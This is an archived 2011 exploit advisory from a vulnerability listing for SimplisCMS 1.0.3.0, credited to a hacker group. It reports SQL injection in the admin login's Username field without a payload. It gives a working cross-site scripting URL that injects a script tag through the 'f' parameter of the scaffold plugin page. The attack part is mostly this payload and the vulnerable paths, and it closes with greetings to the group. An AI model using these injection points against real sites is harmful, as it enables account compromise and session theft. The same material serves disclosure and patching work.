Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26014
HistoryMar 29, 2011 - 12:00 a.m.

SimplisCMS 1.0.3.0 SQL injection / Cross Site Scripting

2011-03-2900:00:00
vulners.com
18

##########################################################

Exploit Title: SimplisCMS 1.0.3.0 SQL injection / Cross Site Scripting

home : http://www.D99Y.com

Date: 27/3/2011

Author: NassRawI

Software Link: http://modcove.com/index.php

Demo : http://modcove.com/index.php?page=demo

Version: 1.0.3.0

##########################################################

[1] SQL injection

http://localhost/simpliscms/admin/index.php

Injection in the Username field

[2] Cross Site Scripting

file :

admin/application/plugins/scaffold/index.php

exploit :

http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=[ XSS ]

http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=&lt;FONT size=7 >NassRaWi</FONT> <script>alert("www.d99y.com")</script>

##########################################################

Greetz :

D99Y Team + alroo7 alte No Tkd3 + oхіјєή + ǺŁṀṨŘŎŎŖĨ + JEenY + anT!-Tr0J4n + ReBLOoOV

  • FoFo < x-shadow my baby :$ + ‏Difficult 511 and all members D99Y.CoM

Enjoy :)